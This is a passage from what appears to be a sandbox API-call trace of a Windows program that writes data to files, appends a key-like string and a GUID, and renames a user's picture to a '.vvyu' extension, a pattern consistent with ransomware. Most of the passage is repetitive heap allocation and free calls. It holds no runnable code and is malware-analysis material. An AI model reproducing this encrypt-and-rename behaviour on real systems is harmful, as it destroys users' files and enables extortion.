hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.651] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xf6cf, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xf6cf, lpOverlapped=0x0) returned 1 [0199.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0199.653] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xf6d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.653] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.654] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.655] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.655] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.655] CloseHandle (hObject=0x510) returned 1 [0199.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0199.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0199.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0199.657] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yOmL -Z4 9fyb2IF7S9.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\yoml -z4 9fyb2if7s9.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yOmL -Z4 9fyb2IF7S9.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\yoml -z4 9fyb2if7s9.png.vvyu")) returned 1 [0199.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.659] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0199.662] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaf929b0, ftCreationTime.dwHighDateTime=0x1d8a73b, ftLastAccessTime.dwLowDateTime=0xcef659b0, ftLastAccessTime.dwHighDateTime=0x1d8a73b, ftLastWriteTime.dwLowDateTime=0xcef659b0, ftLastWriteTime.dwHighDateTime=0x1d8a73b, nFileSizeHigh=0x0, nFileSizeLow=0xf6d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yOmL -Z4 9fyb2IF7S9.png", cAlternateFileName="YOML-Z~1.PNG")) returned 0 [0199.662] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0199.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0199.663] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0199.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.663] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0199.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0199.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0199.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0199.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0199.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0199.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0199.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0199.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0199.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0199.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 